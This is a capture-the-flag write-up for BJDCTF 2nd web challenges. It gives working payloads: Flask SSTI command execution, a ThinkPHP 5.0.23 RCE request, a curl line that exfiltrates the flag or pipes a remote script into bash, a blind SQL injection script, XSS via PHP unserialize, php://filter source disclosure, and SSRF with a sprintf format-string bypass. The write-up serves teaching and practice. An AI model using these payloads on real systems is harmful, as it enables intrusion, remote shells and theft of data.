BJDCTF 2nd web

fakegoogle

SSTI

{{ config.__class__.__init__.__globals__['os'].popen('BJD;cat /flag').read() }}

config is Flask's config object; walking from its class to the globals of __init__ reaches the imported os module, and popen().read() returns the command output into the rendered page.

old-hack

ThinkPHP 5.0.23 RCE: the _method override calls Request::__construct() with the request parameters, which sets the filter to system; send the payload as the POST body:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

duangShell

The .index.php.swp leak gives the source (a Vim swap file, recoverable with vim -r .index.php.swp). With command execution, either exfiltrate the flag to a listener in the request path or pull down a reverse shell and run it:

curl ip:port/`tac /flag`   or   curl ip:port | bash

Simple injection

Single quotes, select, mid, and, = and other commonly used characters are filtered; the idea is:
A backslash at the end of the username escapes the closing single quote, so the password field escapes the string literal and becomes part of the query.
The responses differ depending on whether a row is returned, so do boolean-based blind injection one character at a time (^ replaces the filtered and, > replaces the filtered =):

import requests

url = 'http://ec358d69-8850-46e2-9f03-63fa94c4cb6b.node3.buuoj.cn/index.php'
text = ''
for i in range(1, 40):
    # binary search the ASCII value of character i of the password;
    # the oracle is whether 'P3rh4ps' appears in the response (a row matched)
    l = 28
    h = 126
    while abs(h - l) > 1:
        m = (l + h) // 2  # integer division: Python 3 '/' would give a float
        # 'admin\' eats the closing quote of username, so the password value
        # continues the query: ^ (XOR) stands in for the filtered 'and',
        # '>' for the filtered '=', and '#' comments out the rest
        payload = '^ (ascii(substr((password),{},1))>{})#'
        data = {
            'username': 'admin\\',
            'password': payload.format(i, m)
        }
        resp = requests.post(url, data=data)
        if 'P3rh4ps' in resp.text:
            l = m  # char > m
        else:
            h = m  # char <= m
    # the loop ends with l < char <= h and h - l == 1, so the char is h
    text += chr(h)
    print(text)

Fake pig suit, best in the world

Capturing the requests shows a hint.
Replace the time with a timestamp, then the UA header; this site lists a large number of user-agent strings: https://www2.sal.tohoku.ac.jp/~gothit/ua.html
1. Replace the timestamp:

Schrödinger

This is something like a password brute-forcer: you give it a URL and it brute-forces for you; the longer it runs the higher the success rate, and at 100 it is done. So point it at test.php, then replace the cookie, which is a timestamp in base64:
LTMwODU2ODY3Nw==
The result is a Bilibili av number.

xss Light

.git leak

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

The hint is to pop up the cookie. The input goes through unserialize() and is then echoed, so a PHP native class with a __toString() can be used: Exception's __toString() returns its message unescaped.

<?php
$a = new Exception("<script>alert(document.cookie)</script>");
//echo serialize($a);
echo urlencode(serialize($a));

Or directly, since echoing an unserialized string just prints it (the serialized form is s:39:"<script>alert(document.cookie)</script>";):

echo urlencode(serialize("<script>alert(document.cookie)</script>"));

Link to a post on PHP native classes that can be abused this way:
http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E%9F%E7%94%9F%E7%B1%BB/

elements master

This one needs a bit of lateral thinking: the pages are named after element symbols, so walk the periodic table, request <symbol>.php for each, and concatenate the bodies of the pages that exist.

import requests
url = 'http://7c60a665-40e4-4641-b6aa-81e151788526.node3.buuoj.cn/{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']  # element 43 is Tc, not a second Te
text = ''
for i in s:
    r = requests.get(url=url.format(i))
    if r.status_code != 404:
        print(i)
        text += r.text
        # print(r.text)
        print(text)

File detection

Directory discovery turns up home.php and index.php.
home.php includes whatever ?file= names after appending ".php" (when the name ends in home or system), so the sources can be read through the php://filter pseudo-protocol, e.g. file=php://filter/convert.base64-encode/resource=system (this exact payload is inferred from the home.php code below; the original post only shows the result).
system.php:

<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}
?>

home.php

<?php
setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);
if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }
    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }
    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }
    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }
    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}

admin.php is found first, but it only serves its source to 127.0.0.1 (see its code below), so we need SSRF through system.php.

system.php accepts three parameters:
q1: unused
q2: the URL to fetch; it must start with http://127.0.0.1/, must not contain "flag" (filter2), and gets ".y1ng.txt" appended
q3: the request method, which only has to start with GET or POST
finally file_get_contents() fetches the URL and the result is printed through sprintf()

The sprintf() call is the bug: $method is user input pasted into the format string, so a %s in q3 makes sprintf print $detect (the fetched body) as a string. Appending ?s= to the URL turns the forced ".y1ng.txt" suffix into a harmless query value, and the trailing % in q3 merges with the original %d into %%d (a literal %), so the format is left with just the one specifier we supply:

q1=w4nder&q2=http://127.0.0.1/admin.php?s=&q3=get %s%

Get admin.php Source:

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

The decrypt parameter must equal aesEn($_SESSION['secret'], 'y1ng'). $_SESSION['secret'] is random; the comment (// I heard you can break PHP mt_rand seed) is a red herring that suggests seed recovery, but the secret comes from random_bytes(), which cannot be predicted. The assignment, however, sits in the else branch, so it only runs when decrypt is absent. With a fresh session, send ?decrypt= on the very first request to admin.php and $_SESSION['secret'] is still null, which openssl_encrypt() treats as an empty string. The ciphertext is then a fixed value for our address: AES-128-CBC of "" (one block of PKCS#7 padding) under the key 'y1ng' NUL-padded to 16 bytes, with IV md5(REMOTE_ADDR, true). Compute it for the IP the server sees, and send it with the your_ip_address and y1ng cookies that home.php sets so Check() passes.
For the author's address this gives 70klfZeYC+WlC045CcKhtg==, which is URL-encoded before being sent.
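The computation above, as an added example (not code from the original post): it reproduces admin.php's aesEn() for a null secret using Go's standard library, with the key NUL-padded the way openssl_encrypt() pads a short passphrase, and URL-encodes the result the way PHP's urlencode() would. The address 127.0.0.1 is a placeholder; the real value depends on the REMOTE_ADDR the challenge server sees for you.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/base64"
	"errors"
	"fmt"
	"net/url"
)

// phpKey mimics openssl_encrypt()'s handling of a short passphrase:
// "y1ng" is NUL-padded to the 16 bytes AES-128 needs.
func phpKey(pass string) []byte {
	key := make([]byte, aes.BlockSize)
	copy(key, pass)
	return key
}

// pkcs7Pad is the padding openssl_encrypt() applies by default. An empty
// message becomes one full block of 0x10, which is why the answer is a
// single 16-byte block (24 base64 characters ending in "==").
func pkcs7Pad(data []byte) []byte {
	n := aes.BlockSize - len(data)%aes.BlockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(data []byte) ([]byte, error) {
	if len(data) == 0 || len(data)%aes.BlockSize != 0 {
		return nil, errors.New("bad length")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(data[len(data)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return data[:len(data)-n], nil
}

// AesEn reproduces admin.php's aesEn($data, $key): AES-128-CBC,
// IV = md5($_SERVER['REMOTE_ADDR'], true), base64 output.
func AesEn(data []byte, pass, remoteAddr string) (string, error) {
	block, err := aes.NewCipher(phpKey(pass))
	if err != nil {
		return "", err
	}
	iv := md5.Sum([]byte(remoteAddr))
	pt := pkcs7Pad(data)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv[:]).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

// AesDe is the inverse; it is not in admin.php and is only here to confirm
// that the value round-trips to an empty plaintext.
func AesDe(b64, pass, remoteAddr string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of blocks")
	}
	block, err := aes.NewCipher(phpKey(pass))
	if err != nil {
		return nil, err
	}
	iv := md5.Sum([]byte(remoteAddr))
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv[:]).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// DecryptParam is the value to send as ?decrypt= for a session whose secret
// was never assigned: $_SESSION['secret'] is null, openssl_encrypt() treats
// it as "", and PHP's urlencode() escapes the '+' and '=' of the base64.
func DecryptParam(remoteAddr string) (string, error) {
	ct, err := AesEn(nil, "y1ng", remoteAddr)
	if err != nil {
		return "", err
	}
	return url.QueryEscape(ct), nil
}

func main() {
	// placeholder address: use the one the challenge server sees for you
	ip := "127.0.0.1"
	raw, _ := AesEn(nil, "y1ng", ip)
	param, _ := DecryptParam(ip)
	fmt.Printf("aesEn(null, 'y1ng') for %s = %s\n", ip, raw)
	fmt.Printf("admin.php?decrypt=%s\n", param)
}
```

Because the IV is derived from the client address, the value only matches when it is computed for the address in the your_ip_address cookie, i.e. the one the server sees; behind a NAT or proxy that is the public address, not the local one.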

Origin www.cnblogs.com/W4nder/p/12553182.html